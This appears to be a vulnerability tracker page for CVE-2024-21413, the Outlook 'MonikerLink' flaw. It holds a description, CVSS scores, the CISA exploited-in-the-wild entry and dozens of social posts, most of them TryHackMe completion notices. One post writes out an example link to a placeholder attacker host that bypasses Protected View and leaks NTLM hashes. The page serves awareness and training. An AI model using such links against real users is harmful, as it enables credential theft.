CVE-2024-21413

Published Feb 13, 2024

Last updated 10 days ago

Exploit knownCVSS critical 9.8
Microsoft Outlook
Zero-day

Overview

AI description

Automated description summarized from trusted sources.

CVE-2024-21413 is a remote code execution (RCE) vulnerability affecting Microsoft Outlook. It stems from improper input validation when Outlook processes URLs, particularly those using the `file://` protocol and crafted URL structures. This vulnerability, also known as the "MonikerLink" bug, allows attackers to bypass security protections, such as the Office Protected View, and execute arbitrary code on a victim's machine by sending a malicious email. The vulnerability can be triggered even when previewing a maliciously crafted email. Successful exploitation could lead to remote code execution, theft of NTLM credentials, data exfiltration, data encryption, installation of malware, and potential full system compromise. It affects various versions of Microsoft Outlook, including Microsoft Office 2016, 2019, 2021, and Microsoft 365 Apps.

Description
Microsoft Outlook Remote Code Execution Vulnerability
Source
secure@microsoft.com
NVD status
Analyzed
Products
365_apps, office_2016, office_2019, office_long_term_servicing_channel

Risk scores

CVSS 3.1

Type
Secondary
Base score
9.8
Impact score
5.9
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity
CRITICAL

Known exploits

Data from CISA

Vulnerability name
Microsoft Outlook Improper Input Validation Vulnerability
Exploit added on
Feb 6, 2025
Exploit action due
Feb 27, 2025
Required action
Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Weaknesses

secure@microsoft.com
CWE-20
nvd@nist.gov
NVD-CWE-noinfo

Social media

Hype score
Not currently trending
  1. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/bW0adoQMnI #tryhackme via @tryhackme

    @Master_Tianbu

    16 Aug 2026

    3 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/HAiMUgbl3E #tryhackme via @tryhackme

    @happythvgger

    12 Aug 2026

    10 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  3. 🚨 CVE-2024-21413 is now being exploited in the wild. Microsoft Outlook Remote Code Execution Vulnerability Risk 83/100 · EPSS 95% · CVSS 9.8. Patch or mitigate now — it's already being used. https://t.co/PJzUecZwpo #KEV #RCE #ActivelyExploited

    @BytesNora

    10 Aug 2026

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/F2HzWMS6DV #tryhackme via @tryhackme

    @aj046729

    8 Aug 2026

    0 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. 🛡️ #ExploitGrid Daily #Threat Digest Critical Exploits disclosed today: EGE-GH-6VzYuGW ( CVE-2025-32432 ) EGE-GH-xiVZBJy ( CVE-2026-0092 ) EGE-GH-eHNcyov ( CVE-2024-21413 ) EGE-GH-9UtrTVp ( CVE-2024-21413 ) EGE-GH-Ix6VGxH ( CVE-2023-6553 ) ..🧵👇

    @exploitgrid

    7 Aug 2026

    123 Impressions

    0 Retweets

    2 Likes

    0 Bookmarks

    2 Replies

    0 Quotes

  6. Microsoft's Outlook zero-day CVE-2024-21413 is being actively weaponized. The RCE bypasses authentication—this isn't theoretical anymore. Patching is step one, but monitoring your email gateways for anomalous attachment execution is non-negotiable right now.

    @ro0TCr4k

    28 Jul 2026

    140 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  7. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/k7V0cGPVbQ #tryhackme via @tryhackme

    @kent39693519

    26 Jul 2026

    25 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  8. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/PvjGy2KBU7 #tryhackme via @tryhackme

    @samueremos

    9 Jul 2026

    3 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  9. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/lekrNPk0F0 #tryhackme Izvor: @tryhackme

    @BanovacMar72636

    24 Jun 2026

    14 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  10. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/byyOONulDb #tryhackme via @tryhackme

    @CyberForen0n

    18 Jun 2026

    175 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  11. 🚀 Completed the Moniker Link (CVE-2024-21413) room on TryHackMe! Learned about a Microsoft Outlook vulnerability, NTLM authentication, hash capture concepts, and how such attacks can be analyzed in a controlled lab environment. Another great step in my cybersecurity journey!

    @ansh_codez

    14 Jun 2026

    7 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  12. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/GeZUGogsuP #tryhackme via @tryhackme

    @jellyfish21929

    24 May 2026

    7 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  13. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/dDkNFlyWGq #tryhackme via @tryhackme

    @HafzKhalil

    9 May 2026

    32 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  14. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/PnvhVuuh9S #tryhackme via @tryhackme

    @mhmdalq02

    8 May 2026

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  15. I started the exploitation basics module on THM! (CVE-2024-21413) covers a vulnerability in Outlook that allowed attackers to bypass security by adding "!" to a file:// link in an email. Once clicked, it could steal your NTLM credentials. Metasploit is a powerful tool that http

    @Ogechee_

    6 May 2026

    1694 Impressions

    6 Retweets

    60 Likes

    6 Bookmarks

    2 Replies

    0 Quotes

  16. CVE-2024-21413. Status: ✅ Confirmed exploited in the wild Date added: 2025-02-06 Required action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

    @lyrie_ai

    4 May 2026

    45 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  17. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/CuHhd3kwQu #tryhackme via @tryhackme

    @CreamjamBird

    22 Apr 2026

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  18. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/rFMHY02ffE #tryhackme via @tryhackme

    @profession32384

    20 Apr 2026

    4 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  19. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/nFE31geDx0 #tryhackme via @tryhackme

    @SangAlberto

    17 Apr 2026

    14 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/lIqPqz957i #tryhackme via @tryhackme

    @DEDSEC0025

    17 Apr 2026

    44 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  21. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/Xhva2jW3rW #tryhackme через @tryhackme

    @rickert155

    10 Apr 2026

    66 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    1 Quote

  22. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/WjjSKgnGmo #tryhackme via @tryhackme

    @ToheebDev

    6 Apr 2026

    42 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  23. https://t.co/vJqqefVaec Microsoft Outlookにおいて、特定リンクをクリックするだけでリモートコード実行(RCE)が可能になる致命的な脆弱性(CVE-2024-21413)が報告されています。必ず最新のセキュリティ更新を適用してくだ

    @Anti_Ch_PCgc

    2 Apr 2026

    89 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  24. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/LN7DqrjwDk #tryhackme via @tryhackme

    @debmahato8967

    25 Mar 2026

    35 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  25. Day 45: 🔗CVE-2024-21413 (Moniker Link): Diving deep into how a simple Outlook hyperlink can bypass Protected View to leak NTLM hashes or trigger RCE. 🛠️

    @dheeraditya1

    18 Mar 2026

    30 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  26. Outlook RCE CVE-2024-21413 (CVSS 9.8) is HOT! Malicious links exploit NTLM relay via preview pane for RCE. Think targeted phishing, but without a click. Exploit using Responder/Impacket. #Outlook #RCE #Cybersecurity https://t.co/BjeGzZHgIR

    @computerauditor

    17 Mar 2026

    43 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  27. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/k0pdHWw7WT #tryhackme via @tryhackme

    @Jasmin03897025

    17 Mar 2026

    54 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/87RysCQWhk #tryhackme via @tryhackme

    @dronjx

    16 Mar 2026

    60 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  29. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/6mcGNF0J6B #tryhackme via @tryhackme

    @lerchmirko

    14 Mar 2026

    71 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/bT1Aoqvy7R

    @Ryad3135

    11 Mar 2026

    37 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  31. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/96Zk5MF9yT #tryhackme via @tryhackme

    @XaliqRagimli27

    10 Mar 2026

    65 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  32. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/7rjTiv9kYO #tryhackme via @tryhackme

    @chuol_hoth

    28 Feb 2026

    59 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/UUeK4V6W0z #tryhackme via @tryhackme

    @mgillanders

    28 Feb 2026

    48 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  34. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/Eu6ilZW3mh #tryhackme via @tryhackme

    @KuriJMandara

    26 Feb 2026

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  35. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/Eu6ilZVvwJ #tryhackme via @tryhackme

    @KuriJMandara

    26 Feb 2026

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  36. 🚨 [CRITICAL] APT29 OAuth Token Theft Campaign APT29 actively exploiting OAuth token theft t… 🔴 CVE: CVE-2024-21413 🕵️ APT: APT29 🏭 Sectors: finance, government #mysocAi #CyberSecurityusingAi #ThreatIntel #CVE202421413 🔗 https://t.co/1VmtnQVX6T

    @MysocAi

    23 Feb 2026

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  37. 🚨 [CRITICAL] APT29 OAuth Token Theft Campaign APT29 actively… 🔴 CVE: CVE-2024-21413 🕵️ APT: APT29 🏭 Sectors: finance, government #mysocAi #CyberSecurityusingAi #Vulnerability #Criticality #ThreatIntel #CVE202421413 🔗 https://t.co/1VmtnQVX6T

    @MysocAi

    23 Feb 2026

    2 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. 🚨 [CRITICAL] APT29 Midnight Blizzard Active Campaign via OAuth Token Theft … 🔴 CVE: CVE-2024-21413, CVE-2024-20671 🕵️ APT: APT29 🏭 Sectors: finance, government #mysocAi #CyberSecurityusingAi #Vulnerability #Criticality #ThreatIntel #CyberSecurity #CVE202421413

    @MysocAi

    23 Feb 2026

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  39. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/k8il1CJ4og #tryhackme via @tryhackme

    @Mr_ajitsharma74

    22 Feb 2026

    3 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  40. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/M3D111EzAJ #tryhackme @tryhackmeより

    @Sirai_Tukuyomi

    21 Feb 2026

    44 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  41. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/ahRjmwCiSp #tryhackme via @tryhackme

    @White_Crow017

    20 Feb 2026

    54 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  42. Just learned how CVE-2024-21413 (Moniker Link vuln) works and it’s wild 🤯 Outlook renders HTML emails → attacker embeds a file:// link → adds a special ! trick → bypasses Protected View → Windows auto-authenticates via SMB → leaks NTLM hash 😬 No malware. Just a

    @White_Crow017

    20 Feb 2026

    106 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  43. Day 108 of learning Cybersecurity on TryHackMe, I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/J1ozAD0YTS #tryhackme via @tryhackme

    @DGilcore

    19 Feb 2026

    58 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  44. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! An Outlook's vulnerability in 2024 that leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/J1ozAD0YTS #tryhackme via @tryhackme @ireteeh @Adanna_techie @AdePelumi15 https

    @DGilcore

    19 Feb 2026

    85 Impressions

    1 Retweet

    2 Likes

    1 Bookmark

    1 Reply

    0 Quotes

  45. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/jIq09hIs1e #tryhackme via @tryhackme

    @lumentraaa

    15 Feb 2026

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  46. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/5Sy9eiWyvk #tryhackme via @tryhackme

    @YMoriati42377

    13 Feb 2026

    37 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  47. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/t6qJmMgLNS #tryhackme via @tryhackme

    @quek_guan

    8 Feb 2026

    48 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  48. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! Leak user's credentials using CVE-2024-21413 to bypass Outlook's Protected View. https://t.co/6xUmCMcDdm #tryhackme via @tryhackme

    @Althaf1145

    6 Feb 2026

    45 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  49. The NTLM leak vulnerability (CVE-2024-21413): User receives email with link: file://attacker.com/share!\ User clicks. Windows: "Oh, a file share. Let me authenticate." Windows sends: Username + NTLM hash to attacker's server Attacker cracks hash offline One click. Full compromise

    @SALIMASSILI2006

    5 Feb 2026

    47 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  50. I just completed Moniker Link (CVE-2024-21413) room on TryHackMe! https://t.co/igg97EGdwm

    @saaramhussnain

    5 Feb 2026

    58 Impressions

    0 Retweets

    3 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations